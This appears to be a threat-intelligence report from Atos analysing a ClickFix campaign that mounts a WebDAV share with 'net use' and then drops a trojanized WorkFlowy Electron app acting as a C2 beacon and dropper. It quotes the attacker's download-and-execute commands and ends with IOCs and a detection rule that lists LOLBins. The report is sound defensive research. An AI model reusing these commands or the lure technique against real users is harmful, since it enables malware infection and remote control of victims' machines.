Disclaimer: This report was produced by the Threat Research Center to increase cybersecurity awareness and support strengthening defensive capabilities. This is based on independent research and observations of the current threat landscape available at the time of publication. This content is for informational and preparatory purposes only.
Read more blogs on threat intelligence and adversary research: https://atos.net/en/lp/cybershield
summary
Atos researchers have identified a new variant of the popular ClickFix method. In this technique, an attacker uses a Win+R shortcut to trick a user into running malicious commands on their device. This variation uses the “net use” command to map a network drive from an external server, and then runs a “.cmd” batch file hosted on that drive. The script downloads a ZIP archive, unzips it, and runs a legitimate WorkFlowy application with modified malicious logic hidden inside an “.asar” archive. This acts as a C2 beacon and a dropper for the final malware payload.
Figure 1: Overview of attack flow.
Attack overview
In this version, the initial attack vector is the same as in all other versions: the web page “happyglamper” disguised as a capture mechanism.[.]Users are asked to press “Win+R” followed by “Ctrl+V” and “Enter” to open the executable application.
Figure 2: Phishing website 1
Figure 3: Phishing website 2
This will run the following command:
“cmd.exe” /c net use Z: http://94.156.170[.]255/webdav /persistent:no && “Z:\update.cmd” & net use Z: /delete
Typically at this stage, the attacker uses PowerShell or mshta to download and execute the next stage of the malware. Here, you can see that “net use” is instead used to map and connect to the network drive of the external server where the batch script is run. While not new, these TTPs have not been previously seen in ClickFix attacks. Combined with the following unusual stages of the infection pattern, this campaign gives adversaries a high chance of evading defensive controls and staying under the radar of defenders.
In this case, the ClickFix variant of the observed execution flow successfully bypassed Microsoft Defender for Endpoint detection. Atos’ security team was able to detect this thanks to an internal threat hunting service that focuses on a key operational aspect of the ClickFix technique: initial execution via the RunMRU registry key (hunting queries available in the appendix section).
The initial execution script “update.cmd” is loaded and executed from the mapped drive. The mapped drive will then be deleted. Contents of “update.cmd”:
start “” /min powershell -WindowStyle Hidden -Command “Invoke-WebRequest ‘http://94.156.170[.]255/flowy.zip’ -OutFile \”$env:TEMP\dl.zip\”; Expand-Archive \”$env:TEMP\dl.zip\” -DestinationPath \”$env:LOCALAPPDATA\MyApp\” -Force;Start process “$env:LOCALAPPDATA\MyApp\WorkFlowy.exe\””
This will generate a PowerShell instance that will download the zip archive and unzip it to the “%LOCALAPPDATA%\MyApp\” directory. Next, run the “WorkFlowy.exe” binary.
Figure 4: Contents of flowy.zip archive
WorkFlowy analysis
The archive contains the WorkFlowy desktop application (version 1.4.1050) signed by developer “FunRoutine Inc.” and distributed as an Electron application bundle. Electron applications are created using common web technologies (HTML, CSS, JavaScript) and use “.asar” archives for packing source code during application packing. This is done for a variety of reasons, including mitigating issues with long path names on Windows. The malicious code was injected into the app’s Node.js entry point, main.js, hidden within the app.asar archive.
Technical profile
Property Value Target application WorkFlowy Desktop (Electron) Malicious version 1.4.1050 Malicious file resource/app.asar → /main.js C2 domain cloudflare.report/forever/e/ C2 origin IP 144[.]31[.]165[.]173 (Frankfurt, AS215439 play2go.cloud) Domain Registration Date January 2026, Hong Kong Registrant, OnlineNIC Registrant Victim ID File %APPDATA%\id.txt Dropper Staging Directory %TEMP%\[unix_timestamp]\
infection vector
The malicious ASAR archive is a direct replacement for the legitimate resource/app.asar. The attacker repackaged older versions of the app (v1.4 and now v4.3) using the injected code.
Figure 5: Contents of the “resources” subdirectory
Malicious code (droppers/beacons)
When WorkFlowy runs, it looks for the app.asar file within the relative path hard-coded into the binary. It then internally reads the main.js file, decodes it into a string, parses it with the embedded V8 Google JavaScript engine, and executes it. The attacker replaced the legitimate main.js with one of his own creation. Instead of a well-structured script, they used a highly obfuscated online structure and added malicious code on top of the legitimate code, allowing it to run first and blocking WorkFlowy’s functionality.
The malicious code contains several important features.
The malware executes before the legitimate application starts. The inserted IIFE is opened with await f() (infinite C2 beacon loop). f() is never resolved, so all subsequent legitimate WorkFlowy initialization code is blocked forever. The malware runs with full Node.js privileges immediately after startup.
Persistent victim fingerprinting via %APPDATA%\id.txt: On first execution, a random 8-character alphanumeric ID is generated and written to %APPDATA%\id.txt. On subsequent executions, the saved ID is read back, giving the attacker a stable identifier for each victim machine throughout the session.
C2 Beacon — Extracts host ID every 2 seconds. The function u() sends an HTTP POST containing the victim’s unique ID, machine name, and Windows username to the C2 server. The f() loop repeats this infinitely every 2 seconds.
Downloading and executing a remote payload: Function p() receives a task object from the C2, decodes the base64-encoded file contents, writes them to a timestamped directory under %TEMP%, and executes the .exe via child_process.exec.
If a C2 connection is not established, no files or directories will be generated. At the time of this analysis, the C2 domain was already unresponsive.
Why Electron is an effective delivery mechanism
The malicious code runs in the Node.js main process outside of the Chromium sandbox with the full privileges of the logged-in user, allowing the malicious code to perform any actions that the user is authorized to perform on the system. It also helps hide malicious code, as no files are actually written to disk and the malicious payload is packed inside an “.asar” archive.
sustainability
OS-level persistence is not implemented via the dropper. Beacons only work while WorkFlowy is open. The only artifact written to disk before the next stage delivery is %APPDATA%\id.txt (victim tracking ID), and only if the connection to the C2 is successfully established. Presumably, OS-level persistence is delegated to the payload that the C2 delivers via the dropper.
Read more blogs on threat intelligence and adversary research: https://atos.net/en/lp/cybershield
Important points
This ClickFix variant is important because it moves initial access away from commonly exploited scripting and execution engines such as PowerShell, MSHTA, and WScript, and instead relies on the use of the net to exploit WebDAV as a delivery mechanism. Previous ClickFix campaigns typically exposed themselves by directly calling interpreters or non-terrestrial binaries that are heavily monitored by modern EDR solutions. In contrast, this iteration mounts the remote WebDAV share as a local drive, runs a hosted batch file through standard file system semantics, and removes the mapping immediately after use. This shows that ClickFix is still evolving and is expanding its arsenal of proxy execution methods and starting to take advantage of native network utilities.
The malicious logic is hidden by replacing the contents of the Workflowy application’s app.asar archive with a trojanized version of main.js. The code runs within Electron’s main process and remains packaged within the legitimate application, thereby avoiding many file-based behavior detections focused on standalone loaders and script interpreters. Since ASAR archives are rarely inspected, the dropper logic can be executed through normal application startup with minimal visibility.
This activity was not detected by security controls and was only identified through targeted threat hunting on Atos. Detection relies on analysis of execution context rather than payload indicators, especially in Explorer[実行]We were detecting suspicious command executions originating from dialogs (recorded within the RunMRU registry key). This highlights the growing importance of threat hunting as a complementary detection mechanism. As ClickFix campaigns move toward native utilities and trusted applications that generate fewer alerts, only proactive, hypothesis-driven hunting can help bring these weak signals to the surface early and disrupt the attack chain.
appendix
IOC
domain cloudflare[.]report domain happyglamper[.]roIP94[.]156[.]170[.]255 IP 144[.]31[.]165[.]173 URL https://cloudflare[.]report/forever/e/ file %APPDATA%\id.txt path %TEMP%\[13-digit-timestamp]\ SHA256 a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063 (app.asar) SHA256 9ee58eb59e337c06429ff3f0afd0ee6886b0644ddd4531305b269e97ad2b8d42 (WorkFlowy.exe – Older version of legitimate binary, not malicious) SHA256 dc95f7c7fb98ec30d3cb03963865a11d1b7b696e34f163b8de45f828b62ec829 (main.js)
hunting query
title:[ファイル名を指定して実行]Suspicious command executed in dialog id: 20891a30-032e-4f15-a282-fa4a8b0d8aaestatus: Experimentaldescription: Explorer.exe is the starting process and the Explorer RunMRU registry key (usually[ファイル名を指定して実行]Detects suspicious command interpreters and LOLBins written to (used for dialog history). author: TRCdate: 2026-03-05 Tags: – Attack.Execution – Attack.t1059 – Attack.Defense_Evasion Log Source: Category: registry_set Product: Windows Definition: “Sysmon Event ID 13 (Registry Value Set) or equivalent EDR registry telemetry” Detection: select_key: TargetObject|Contains: ‘\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU’selection_proc: Image|Ends with: ‘\explorer.exe’selection_data: Details|Contains: – ‘cmd’ – ‘powershell’ – ‘cmd.exe’ – ‘powershell.exe’ – ‘wscript.exe’ – ‘cscript.exe’ – ‘net.exe’ – ‘net1.exe’ – ‘sh.exe’ – ‘bash.exe’ – ‘schtasks.exe’ – ‘regsvr32.exe’ – ‘hh.exe’ – ‘wmic.exe’ – ‘mshta.exe’ – ‘rundll32.exe’ – ‘msiexec.exe’ – ‘forfiles.exe’ – ‘scriptrunner.exe’ – ‘mftrace.exe’ – ‘AppVLP.exe’ – ‘svchost.exe’ – ‘msbuild.exe’ Conditions: selection_key, selection_proc, selection_datafalsepositives: – “Legitimate administrative activity using the Run dialog (Win+R) to run a built-in tool.” – “IT script or troubleshooting step run interactively by the user” Level: Medium
Read more blogs on threat intelligence and adversary research: https://atos.net/en/lp/cybershield
Source link
